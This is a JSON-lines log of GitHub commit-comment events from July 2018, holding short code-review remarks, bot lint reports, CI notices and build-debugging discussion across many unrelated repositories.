{"id":"8003332194","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29799011,"position":null,"line":null,"path":null,"commit_id":"b49e95e9d3692f40fc3d75ec886fb3ffe7bc09f2","created_at":"2018-07-23T11:34:18Z","updated_at":"2018-07-23T11:34:18Z","author_association":"COLLABORATOR","body":"Please try to include MKDEBUG=yes in your mk.conf or command line argument passed to 'make'."}},"created_at":"2018-07-23T11:34:18Z"}
{"id":"8003337514","type":"CommitCommentEvent","actor":{"login":"stylianos-agapiou-sonarsource"},"repo":{"name":"stylianos-agapiou-sonarsource/sonar-solidity"},"payload":{"comment":{"id":29799025,"position":null,"line":null,"path":null,"commit_id":"3e96c7698cb715f8381bf4cd24749d1f0f0824f6","created_at":"2018-07-23T11:35:35Z","updated_at":"2018-07-23T11:35:35Z","author_association":"OWNER","body":"fix #73 "}},"created_at":"2018-07-23T11:35:35Z"}
{"id":"8003340512","type":"CommitCommentEvent","actor":{"login":"filipekiss"},"repo":{"name":"filipekiss/vimfiles"},"payload":{"comment":{"id":29799035,"position":4,"line":6,"path":"after/plugin/UltiSnips.vim","commit_id":"1453496d201b24eecedd42280850ec0d7a2b8fee","created_at":"2018-07-23T11:36:17Z","updated_at":"2018-07-23T11:36:17Z","author_association":"OWNER","body":"Oops. My mistake. This one is not related to NCM2 actually, It's related to [vim-sneak](https://github.com/justinmk/vim-sneak). This ensures Ultisnips will disable maps that affect the `SELECT` mode (everything that's a `v[nore]map` or a `s[nore]map`), since it uses `SELECT` mode to jump between stops."}},"created_at":"2018-07-23T11:36:17Z"}
{"id":"8003342387","type":"CommitCommentEvent","actor":{"login":"ZE3kr"},"repo":{"name":"ZE3kr/Cloudflare-CNAME-Setup"},"payload":{"comment":{"id":29799038,"position":null,"line":null,"path":null,"commit_id":"b9f6a3c5a8c921858d883bc3c70e123698e66326","created_at":"2018-07-23T11:36:44Z","updated_at":"2018-07-23T11:36:44Z","author_association":"OWNER","body":"Closed #1"}},"created_at":"2018-07-23T11:36:44Z"}
{"id":"8003343164","type":"CommitCommentEvent","actor":{"login":"EricWF"},"repo":{"name":"google/benchmark"},"payload":{"comment":{"id":29799042,"position":null,"line":null,"path":null,"commit_id":"a6a1b0d765b116bb9c777d45a299ae84a2760981","created_at":"2018-07-23T11:36:55Z","updated_at":"2018-07-23T11:36:55Z","author_association":"COLLABORATOR","body":"Installing `scipy` has been annoying, each time I've done it. Perhaps we should explore exactly why we need `scipy`, and ensure we can't replace it.\r\n\r\nThat being said, I think our primary concern is ensuring it's easy to write and run benchmarks. That is, our C++ interface and dependencies are paramount. Additional tooling should be allowed to make use of w/e it needs, within reason. "}},"created_at":"2018-07-23T11:36:55Z"}
{"id":"8003343186","type":"CommitCommentEvent","actor":{"login":"scorpions786"},"repo":{"name":"scorpions786/openemr"},"payload":{"comment":{"id":29799043,"position":null,"line":null,"path":null,"commit_id":"b901fdc5dab07760aad4103cd2038780c43d5edd","created_at":"2018-07-23T11:36:56Z","updated_at":"2018-07-23T11:36:56Z","author_association":"OWNER","body":"maybe the count should be under "}},"created_at":"2018-07-23T11:36:56Z"}
{"id":"8003343466","type":"CommitCommentEvent","actor":{"login":"jjscarafia"},"repo":{"name":"aeroo/aeroolib"},"payload":{"comment":{"id":29799044,"position":null,"line":null,"path":null,"commit_id":"45ab00c5d67b3bcd46ffbaeadb945ef63c976398","created_at":"2018-07-23T11:37:00Z","updated_at":"2018-07-23T11:37:00Z","author_association":"CONTRIBUTOR","body":"This genshi version is newer, not older, it is installed from \"git+https://github.com/edgewall/genshi.git/@stable/0.7.x#egg=genshi-0\"\r\nand fixes this error you will find on many reports https://genshi.edgewall.org/ticket/600"}},"created_at":"2018-07-23T11:37:00Z"}
{"id":"8003347800","type":"CommitCommentEvent","actor":{"login":"MMihran"},"repo":{"name":"MMihran/newLight-final"},"payload":{"comment":{"id":29799050,"position":12,"line":1196,"path":"private.html","commit_id":"ecacc06734ed4e141d4052dff628f3b360f86ee6","created_at":"2018-07-23T11:38:00Z","updated_at":"2018-07-23T11:38:00Z","author_association":"OWNER","body":"HERE"}},"created_at":"2018-07-23T11:38:00Z"}
{"id":"8003350867","type":"CommitCommentEvent","actor":{"login":"MalloyDelacroix"},"repo":{"name":"MalloyDelacroix/DownloaderForReddit"},"payload":{"comment":{"id":29799055,"position":null,"line":null,"path":null,"commit_id":"6be5d5a5145174eb56b53ab222941cabe648c331","created_at":"2018-07-23T11:38:42Z","updated_at":"2018-07-23T11:38:42Z","author_association":"OWNER","body":"Nice catch.  It's been added."}},"created_at":"2018-07-23T11:38:42Z"}
{"id":"8003358411","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29799073,"position":null,"line":null,"path":null,"commit_id":"f74b789735d7288a2166d3073e0235940ac0fdb5","created_at":"2018-07-23T11:40:24Z","updated_at":"2018-07-23T11:40:24Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux branch"}},"created_at":"2018-07-23T11:40:24Z"}
{"id":"8003361740","type":"CommitCommentEvent","actor":{"login":"razorex"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29799082,"position":null,"line":null,"path":null,"commit_id":"d198afb6b5a77d1119f2df15342269c85ece6731","created_at":"2018-07-23T11:41:05Z","updated_at":"2018-07-23T11:41:05Z","author_association":"CONTRIBUTOR","body":"Oui c'est vrai."}},"created_at":"2018-07-23T11:41:05Z"}
{"id":"8003362421","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29799085,"position":null,"line":null,"path":null,"commit_id":"7858fa03cf77bf2ed05337cb4886b479e3546773","created_at":"2018-07-23T11:41:14Z","updated_at":"2018-07-23T11:41:14Z","author_association":"COLLABORATOR","body":"自作のメソッドに対してはjavadocでメソッド・パラメーター・返却値の説明を書くようにしてください。\r\n佐藤"}},"created_at":"2018-07-23T11:41:14Z"}
{"id":"8003366405","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29799099,"position":null,"line":null,"path":null,"commit_id":"3730f384fa7b8ce8e4adef46dec5c0cdc964c5e3","created_at":"2018-07-23T11:42:10Z","updated_at":"2018-07-23T11:42:10Z","author_association":"OWNER","body":"@cnuke: please consider to add to your dde_linux branch"}},"created_at":"2018-07-23T11:42:10Z"}
{"id":"8003367471","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29799105,"position":68,"line":56,"path":"e_16/src/e_16_2/e_16_2.java","commit_id":"7858fa03cf77bf2ed05337cb4886b479e3546773","created_at":"2018-07-23T11:42:24Z","updated_at":"2018-07-23T11:42:24Z","author_association":"COLLABORATOR","body":"引数の命名の修正検討をお願いします。\r\n佐藤"}},"created_at":"2018-07-23T11:42:24Z"}
{"id":"8003368129","type":"CommitCommentEvent","actor":{"login":"Rushikoli"},"repo":{"name":"ollaindia/olla_india_website"},"payload":{"comment":{"id":29799108,"position":2,"line":2,"path":"README.md","commit_id":"368403752eafe85fd48d2ccff1c308d9ddacb30a","created_at":"2018-07-23T11:42:34Z","updated_at":"2018-07-23T11:42:34Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-23T11:42:34Z"}
{"id":"8003374543","type":"CommitCommentEvent","actor":{"login":"NadiiaN"},"repo":{"name":"NadiiaN/improved-pancake"},"payload":{"comment":{"id":29799132,"position":null,"line":null,"path":null,"commit_id":"622532a73bd8562cad7e91e2a70f79fdcc010f94","created_at":"2018-07-23T11:44:03Z","updated_at":"2018-07-23T11:44:03Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-23T11:44:03Z"}
{"id":"8003382365","type":"CommitCommentEvent","actor":{"login":"MMihran"},"repo":{"name":"MMihran/newLight-final"},"payload":{"comment":{"id":29799148,"position":10,"line":1194,"path":"private.html","commit_id":"ecacc06734ed4e141d4052dff628f3b360f86ee6","created_at":"2018-07-23T11:45:49Z","updated_at":"2018-07-23T11:45:49Z","author_association":"OWNER","body":"поправка вкладок "}},"created_at":"2018-07-23T11:45:49Z"}
{"id":"8003383026","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29799151,"position":null,"line":null,"path":null,"commit_id":"bc5a96cefb7a76361df17a0b8262152bfde220b5","created_at":"2018-07-23T11:45:57Z","updated_at":"2018-07-23T11:45:57Z","author_association":"NONE","body":"<kbd>C-c p</kbd> is muscle memory, I switched back to it immediately. Sorry. :)"}},"created_at":"2018-07-23T11:45:57Z"}
{"id":"8003383335","type":"CommitCommentEvent","actor":{"login":"rmehner"},"repo":{"name":"ai/autoprefixer-rails"},"payload":{"comment":{"id":29799152,"position":null,"line":null,"path":null,"commit_id":"046ec5e77094877b1afe7bae3b8c06e1ef011436","created_at":"2018-07-23T11:46:02Z","updated_at":"2018-07-23T11:46:02Z","author_association":"NONE","body":"Hey there,\r\n\r\nI saw that you removed support for Sprockets 3, even though it's the latest stable version and Sprockets 4 is still beta. What is the reasoning behind this? Trying to read up before I upgrade on my projects and it feels like I've missed something :)\r\n\r\nThank you 🙇"}},"created_at":"2018-07-23T11:46:02Z"}
{"id":"8003388039","type":"CommitCommentEvent","actor":{"login":"PhiBabin"},"repo":{"name":"RoboCupULaval/StrategyAI"},"payload":{"comment":{"id":29799162,"position":66,"line":87,"path":"ai/STA/Tactic/goalkeeper.py","commit_id":"95216cd04d33cb1a2bffdcfde2232a0982ce4f5e","created_at":"2018-07-23T11:47:06Z","updated_at":"2018-07-23T11:47:06Z","author_association":"CONTRIBUTOR","body":"oui sa marcherait, mais cela limiterai entre pi et -pi, au lieu d'entre, +/-MAX_ANGLE"}},"created_at":"2018-07-23T11:47:06Z"}
{"id":"8003389404","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/anpy"},"payload":{"comment":{"id":29799163,"position":5,"line":37,"path":"anpy/dossier_like_senapy.py","commit_id":"5ac7481ea551fcec0d5185ae4d5f0ce474c85634","created_at":"2018-07-23T11:47:24Z","updated_at":"2018-07-23T11:47:24Z","author_association":"MEMBER","body":"en fait `download_an()` est fait pour telecharger seulement les anciens dossiers, je devrait le renommer pour que ce soit clair"}},"created_at":"2018-07-23T11:47:24Z"}
{"id":"8003389988","type":"CommitCommentEvent","actor":{"login":"GG1991"},"repo":{"name":"GG1991/micropp"},"payload":{"comment":{"id":29799164,"position":24,"line":205,"path":"src/ell.cpp","commit_id":"455b3a0a7ea81737862a24ba809a77ee257344c8","created_at":"2018-07-23T11:47:32Z","updated_at":"2018-07-23T11:47:32Z","author_association":"OWNER","body":"This was a bug"}},"created_at":"2018-07-23T11:47:32Z"}
{"id":"8003390889","type":"CommitCommentEvent","actor":{"login":"GG1991"},"repo":{"name":"GG1991/micropp"},"payload":{"comment":{"id":29799166,"position":5,"line":60,"path":"src/micro2D.cpp","commit_id":"455b3a0a7ea81737862a24ba809a77ee257344c8","created_at":"2018-07-23T11:47:43Z","updated_at":"2018-07-23T11:47:43Z","author_association":"OWNER","body":"This was a bug"}},"created_at":"2018-07-23T11:47:43Z"}
{"id":"8003393571","type":"CommitCommentEvent","actor":{"login":"varshneyayush"},"repo":{"name":"huytquoc/tx_classification_by_fastText"},"payload":{"comment":{"id":29799173,"position":52,"line":52,"path":"tx_fastText.R","commit_id":"15db52022b33e1ede3924a2e33f8108e5b0963cf","created_at":"2018-07-23T11:48:18Z","updated_at":"2018-07-23T11:48:18Z","author_association":"NONE","body":"train$comment_text <- iconv(train$comment_text, 'UTF-8', 'ASCII')\r\n# converting the special text like emojis etc"}},"created_at":"2018-07-23T11:48:18Z"}
{"id":"8003394233","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/anpy"},"payload":{"comment":{"id":29799175,"position":35,"line":395,"path":"anpy/dossier_like_senapy.py","commit_id":"5ac7481ea551fcec0d5185ae4d5f0ce474c85634","created_at":"2018-07-23T11:48:26Z","updated_at":"2018-07-23T11:48:26Z","author_association":"MEMBER","body":"bien vu, ce serait plus robuste, même si l'entremêlement des cas m'échappe à ce point"}},"created_at":"2018-07-23T11:48:26Z"}
{"id":"8003396602","type":"CommitCommentEvent","actor":{"login":"Dasc3er"},"repo":{"name":"devcode-it/openstamanager"},"payload":{"comment":{"id":29799176,"position":null,"line":null,"path":null,"commit_id":"10ba6960df5e95a44432664e80b0fa2754c7bf53","created_at":"2018-07-23T11:48:57Z","updated_at":"2018-07-23T11:48:57Z","author_association":"CONTRIBUTOR","body":"@lucasalva87 Miglioramento con supporto ad HTMLBuilder nel commit 79c84f0."}},"created_at":"2018-07-23T11:48:57Z"}
{"id":"8003397873","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29799178,"position":null,"line":null,"path":null,"commit_id":"b49e95e9d3692f40fc3d75ec886fb3ffe7bc09f2","created_at":"2018-07-23T11:49:15Z","updated_at":"2018-07-23T11:49:15Z","author_association":"OWNER","body":"I've added MKDEBUG=yes to /etc/mk.conf. And what's more, I observed that every compiling line has been added with \"-g\", but there was still no symbol."}},"created_at":"2018-07-23T11:49:15Z"}
{"id":"8003398959","type":"CommitCommentEvent","actor":{"login":"lassegit"},"repo":{"name":"lassegit/react-pell2"},"payload":{"comment":{"id":29799182,"position":null,"line":null,"path":null,"commit_id":"fe00cc49ca23d108bcd60b65588a5cb961896fe7","created_at":"2018-07-23T11:49:31Z","updated_at":"2018-07-23T11:49:31Z","author_association":"OWNER","body":"\n **src/index.js** (10) \n<code>Useless constructor.</code><code>[L15:3](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L15)</code>[…](http://eslint.org/docs/rules/no-useless-constructor \"no-useless-constructor\")\n<code>Missing trailing comma.</code><code>[L25:34](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L25)</code>[…](http://eslint.org/docs/rules/comma-dangle \"comma-dangle\")\n<code>Prop type `array` is forbidden</code><code>[L54:3](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L54)</code>[…](https://github.com/yannickcr/eslint-plugin-react/blob/master/docs/rules/forbid-prop-types.md \"react/forbid-prop-types\")\n<code>Prop type `object` is forbidden</code><code>[L55:3](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L55)</code>[…](https://github.com/yannickcr/eslint-plugin-react/blob/master/docs/rules/forbid-prop-types.md \"react/forbid-prop-types\")\n<code>Prop type `object` is forbidden</code><code>[L56:3](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L56)</code>[…](https://github.com/yannickcr/eslint-plugin-react/blob/master/docs/rules/forbid-prop-types.md \"react/forbid-prop-types\")\n<code>propType \"style\" is not required, but has no corresponding defaultProp declaration.</code><code>[L56:3](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L56)</code>[…](https://github.com/yannickcr/eslint-plugin-react/blob/master/docs/rules/require-default-props.md \"react/require-default-props\")\n<code>Missing trailing comma.</code><code>[L56:26](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L56)</code>[…](http://eslint.org/docs/rules/comma-dangle \"comma-dangle\")\n<code>Missing trailing comma.</code><code>[L73:11](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L73)</code>[…](http://eslint.org/docs/rules/comma-dangle \"comma-dangle\")\n<code>Missing trailing comma.</code><code>[L78:28](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L78)</code>[…](http://eslint.org/docs/rules/comma-dangle \"comma-dangle\")\n<code>Missing trailing comma.</code><code>[L79:4](https://github.com/lassegit/react-pell2/blob/fe00cc49ca23d108bcd60b65588a5cb961896fe7/src/index.js#L79)</code>[…](http://eslint.org/docs/rules/comma-dangle \"comma-dangle\")\n\n Made by [Gitdude.com](https://gitdude.com \"Helpful comments\")"}},"created_at":"2018-07-23T11:49:31Z"}
{"id":"8003399220","type":"CommitCommentEvent","actor":{"login":"tendomatGitHub"},"repo":{"name":"tendomatGitHub/openmrs-module-idgen"},"payload":{"comment":{"id":29799184,"position":null,"line":null,"path":null,"commit_id":"c0083b11cd99402ec4bb74a8606739b85ce4706b","created_at":"2018-07-23T11:49:35Z","updated_at":"2018-07-23T11:49:35Z","author_association":"OWNER","body":"@dkayiwa Please review this https://issues.openmrs.org/browse/IDGEN-42"}},"created_at":"2018-07-23T11:49:35Z"}
{"id":"8003409375","type":"CommitCommentEvent","actor":{"login":"shay-berman"},"repo":{"name":"amnonskalka/multi_site_oracle"},"payload":{"comment":{"id":29799201,"position":15,"line":42,"path":"utilities.py","commit_id":"dd053f16b7326be70cada03be14e200f7bbf8a7b","created_at":"2018-07-23T11:51:40Z","updated_at":"2018-07-23T11:51:40Z","author_association":"NONE","body":"please add comment that describe the function and each of the variables and the return code.  so it will be more clear."}},"created_at":"2018-07-23T11:51:40Z"}
{"id":"8003409547","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29799202,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T11:51:42Z","updated_at":"2018-07-23T11:51:42Z","author_association":"NONE","body":"@locutus2 \r\nWill you be willing to run a 20k regression test at LTC for this patch?  I am curious what the ELO may be...\r\n\r\n"}},"created_at":"2018-07-23T11:51:42Z"}
{"id":"8003409548","type":"CommitCommentEvent","actor":{"login":"shay-berman"},"repo":{"name":"amnonskalka/multi_site_oracle"},"payload":{"comment":{"id":29799203,"position":20,"line":47,"path":"utilities.py","commit_id":"dd053f16b7326be70cada03be14e200f7bbf8a7b","created_at":"2018-07-23T11:51:42Z","updated_at":"2018-07-23T11:51:42Z","author_association":"NONE","body":"- state a comment why you do \"list\" convert.\r\n- no need to use extra varialbe \"values\" for this conversion.\r\n\r\n"}},"created_at":"2018-07-23T11:51:42Z"}
{"id":"8003412089","type":"CommitCommentEvent","actor":{"login":"trotsiuk"},"repo":{"name":"checcomi/threePGN-package"},"payload":{"comment":{"id":29799213,"position":5,"line":6,"path":"R/3PG.R","commit_id":"830de637d5afcdaca9bd987bcf4ac46fd9f6081c","created_at":"2018-07-23T11:52:15Z","updated_at":"2018-07-23T11:52:15Z","author_association":"COLLABORATOR","body":"maybe something like this will be helpful\r\n\r\n```\r\nnoOfWeather <- dim(weather)[3]\r\nif( noOfWeather != noOfSites) stop('Provided weather data don't much with site data')\r\n```"}},"created_at":"2018-07-23T11:52:15Z"}
{"id":"8003415401","type":"CommitCommentEvent","actor":{"login":"onaforeignshore"},"repo":{"name":"JulienPivard/powerlevel9k"},"payload":{"comment":{"id":29799219,"position":5,"line":83,"path":"functions/colors.zsh","commit_id":"e39e024e741bdfa139a700eccd4e481affdbf4a0","created_at":"2018-07-23T11:52:57Z","updated_at":"2018-07-23T11:52:57Z","author_association":"NONE","body":"Why not just use `[[ ${(L)1} == \"none\" ]]` ?"}},"created_at":"2018-07-23T11:52:57Z"}
{"id":"8003415566","type":"CommitCommentEvent","actor":{"login":"Feifei02"},"repo":{"name":"Feifei02/asd"},"payload":{"comment":{"id":29799220,"position":null,"line":null,"path":null,"commit_id":"d0d7862a3024069e09ecfeae4adebfad982f7a37","created_at":"2018-07-23T11:52:59Z","updated_at":"2018-07-23T11:52:59Z","author_association":"OWNER","body":"sdfsdf"}},"created_at":"2018-07-23T11:52:59Z"}
{"id":"8003420775","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29799231,"position":null,"line":null,"path":null,"commit_id":"b49e95e9d3692f40fc3d75ec886fb3ffe7bc09f2","created_at":"2018-07-23T11:54:06Z","updated_at":"2018-07-23T11:54:06Z","author_association":"COLLABORATOR","body":"I suppose that we are using llvm-symbolizer. It has hardcoded paths to search for debug info like /usr/libdata/debug/.\r\n\r\nIs there generated file name.debug somewhere? (PROG.debug). We can try to move it to the current directory."}},"created_at":"2018-07-23T11:54:06Z"}
{"id":"8003422271","type":"CommitCommentEvent","actor":{"login":"Querijn"},"repo":{"name":"Querijn/BottyMcBotface"},"payload":{"comment":{"id":29799233,"position":null,"line":null,"path":null,"commit_id":"b6e9c623d4f2be8e44c2259b7b4a043e60523010","created_at":"2018-07-23T11:54:24Z","updated_at":"2018-07-23T11:54:24Z","author_association":"OWNER","body":"Wow stelar, wow"}},"created_at":"2018-07-23T11:54:24Z"}
{"id":"8003423745","type":"CommitCommentEvent","actor":{"login":"OrlandoSoto"},"repo":{"name":"cfpb/github-wiki-search"},"payload":{"comment":{"id":29799236,"position":null,"line":null,"path":null,"commit_id":"09dec1e1ef9186f7c5b5b5f30a8ecfe929cb8fba","created_at":"2018-07-23T11:54:44Z","updated_at":"2018-07-23T11:54:44Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-23T11:54:44Z"}
{"id":"8003424367","type":"CommitCommentEvent","actor":{"login":"kimdonwon"},"repo":{"name":"kimdonwon/Hibus2"},"payload":{"comment":{"id":29799238,"position":null,"line":null,"path":null,"commit_id":"577ef8c25d0369387f0c284802a6d58fbcaa9a59","created_at":"2018-07-23T11:54:52Z","updated_at":"2018-07-23T11:54:52Z","author_association":"OWNER","body":"2018년 서울시 앱 공모전 출품작(HiBus)"}},"created_at":"2018-07-23T11:54:52Z"}
{"id":"8003426944","type":"CommitCommentEvent","actor":{"login":"hujun-smile"},"repo":{"name":"hujun-smile/webpack"},"payload":{"comment":{"id":29799245,"position":null,"line":null,"path":null,"commit_id":"4c8c43ed648fd72346b273ee8ad22f64f0857ff2","created_at":"2018-07-23T11:55:24Z","updated_at":"2018-07-23T11:55:24Z","author_association":"OWNER","body":"> __"}},"created_at":"2018-07-23T11:55:24Z"}
{"id":"8003436825","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29799267,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-23T11:57:34Z","updated_at":"2018-07-23T11:57:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T11:57:34Z"}
{"id":"8003438282","type":"CommitCommentEvent","actor":{"login":"Alexandre-df"},"repo":{"name":"luizwbr/Etiquetas-VirtueMart-3"},"payload":{"comment":{"id":29799273,"position":null,"line":null,"path":null,"commit_id":"5f1b10c9841252d8ceba4f38edd34fca9a2c81b7","created_at":"2018-07-23T11:57:54Z","updated_at":"2018-07-23T11:57:54Z","author_association":"NONE","body":"Bom dia.\r\n\r\nO plugin não funciona em minha instalação. \r\n\r\nAo clicar no icone, está gerando o aviso de entrega e não a etiquete. \r\nPlugin ativado\r\nJoomla! 3.8.10\r\nVirtueMart 3.2.14\r\n\r\nObrigado e parabéns pelo excelente trabalho\r\n\r\nAtt\r\n\r\nAlexandre"}},"created_at":"2018-07-23T11:57:54Z"}
{"id":"8003443558","type":"CommitCommentEvent","actor":{"login":"simrat39"},"repo":{"name":"simrat39/android_frameworks_base"},"payload":{"comment":{"id":29799283,"position":null,"line":null,"path":null,"commit_id":"001cc2bf2ad8d35b49bdac52269f12473f6cefe7","created_at":"2018-07-23T11:59:04Z","updated_at":"2018-07-23T11:59:04Z","author_association":"OWNER","body":"CLOCKS FFS\r\n\r\n"}},"created_at":"2018-07-23T11:59:04Z"}
{"id":"8003446376","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/cli"},"payload":{"comment":{"id":29799285,"position":null,"line":null,"path":null,"commit_id":"89da158e66d660ad6e13628a9a72f4b8d386ae3e","created_at":"2018-07-23T11:59:43Z","updated_at":"2018-07-23T11:59:43Z","author_association":"NONE","body":"\n:cold_sweat: It's not you, it's your code. it may not be aligned with your organization's best practices.\n:speak_no_evil: we don’t have additional insights for this pull request\nTo view a full list of the events <a href='https://github.com/codefresh-io/cli/pull/210/checks?check_run_id=8781316'>click here</a>"}},"created_at":"2018-07-23T11:59:43Z"}
{"id":"8003449988","type":"CommitCommentEvent","actor":{"login":"baotiao"},"repo":{"name":"Qihoo360/pika"},"payload":{"comment":{"id":29799297,"position":13,"line":93,"path":"include/pika_conf.h","commit_id":"58b3bba0cb1e56efce8b0e691e041cb68211b9d6","created_at":"2018-07-23T12:00:27Z","updated_at":"2018-07-23T12:00:27Z","author_association":"CONTRIBUTOR","body":"in this single function, we don't need RAII."}},"created_at":"2018-07-23T12:00:27Z"}
{"id":"8003457113","type":"CommitCommentEvent","actor":{"login":"baotiao"},"repo":{"name":"Qihoo360/pika"},"payload":{"comment":{"id":29799313,"position":46,"line":1371,"path":"src/pika_admin.cc","commit_id":"58b3bba0cb1e56efce8b0e691e041cb68211b9d6","created_at":"2018-07-23T12:01:57Z","updated_at":"2018-07-23T12:01:57Z","author_association":"CONTRIBUTOR","body":"we prefer const string than macro.. "}},"created_at":"2018-07-23T12:01:57Z"}
{"id":"8003460792","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29799328,"position":12,"line":22,"path":"e_16/src/e_16_2/e_16_2.java","commit_id":"a15f5b4a4c5798022cea3b22fec541f1465d97a7","created_at":"2018-07-23T12:02:44Z","updated_at":"2018-07-23T12:02:44Z","author_association":"COLLABORATOR","body":"先ほどは気づかなかったんですが、これはもしかすると\"caution\" \"注意\" でしょうか。ちょっと自信ないのでご確認お願いします\r\n佐藤"}},"created_at":"2018-07-23T12:02:44Z"}
{"id":"8003464722","type":"CommitCommentEvent","actor":{"login":"VYUN"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29799333,"position":null,"line":null,"path":null,"commit_id":"7dafd92279643224b4f8e36eec20a49dd0e251a8","created_at":"2018-07-23T12:03:32Z","updated_at":"2018-07-23T12:03:32Z","author_association":"COLLABORATOR","body":"\"VYUN committed 2 days ago\" \r\n\r\nwat"}},"created_at":"2018-07-23T12:03:32Z"}
{"id":"8003467602","type":"CommitCommentEvent","actor":{"login":"MaciekTalaska"},"repo":{"name":"asdf-vm/asdf-erlang"},"payload":{"comment":{"id":29799335,"position":null,"line":null,"path":null,"commit_id":"716d94174956ccbb0f771febe87e02c8df09ba56","created_at":"2018-07-23T12:04:09Z","updated_at":"2018-07-23T12:04:09Z","author_association":"CONTRIBUTOR","body":"I got a little bit surprised by this change. I have installed Erlang (using asdf-erlang) on a new machine recently being sure the docs should be installed by default. I took the laptop with me (no mobile internet) and I ended up with a machine that had no docs at all.\r\n\r\nAnyway, I do understand that some may not want/do not need the docs being installed by default. I think however, that it should be explicitly stated in the asdf-erlang documentation what steps are required to have Erlang with the docs installed. Referring to the kerl documentation is not enough (IMO).\r\n\r\nI was thinking if there is any way of making this script more flexible. The only thing that comes to my mind is using read/case in bash (or even option dialog) but I this approach is of no use for those who would like to create a script calling asdf-erlang - as that would require passing extra command line options, parsing them etc.\r\n\r\nWhat do you think @Stratus3D ? I am happy to improve the docs (for bash and for fish shell users) if you decide this is the way to go."}},"created_at":"2018-07-23T12:04:09Z"}
{"id":"8003469295","type":"CommitCommentEvent","actor":{"login":"mprse"},"repo":{"name":"fkjagodzinski/mbed-os"},"payload":{"comment":{"id":29799337,"position":204,"line":204,"path":"TESTS/mbed_hal/sleep_manager/main.cpp","commit_id":"ee8ea3c9d792190a7e8fd3ba817a6758d1b0d7d1","created_at":"2018-07-23T12:04:27Z","updated_at":"2018-07-23T12:04:27Z","author_association":"COLLABORATOR","body":"This code should be added when PR https://github.com/ARMmbed/mbed-os/pull/7524 is merged.\r\n```\r\n#if DEVICE_LPTICKER && (LPTICKER_DELAY_TICKS > 0)\r\n    // After the OS is disabled wait until the microsecond timer\r\n    // is no longer in use by the lp ticker wrapper code.\r\n    // This prevents the low power ticker wrapper code from\r\n    // getting stuck in a state where it is waiting for\r\n    // the microsecond Timeout to run.\r\n    while (lp_ticker_get_timeout_pending());\r\n#endif\r\n```"}},"created_at":"2018-07-23T12:04:27Z"}
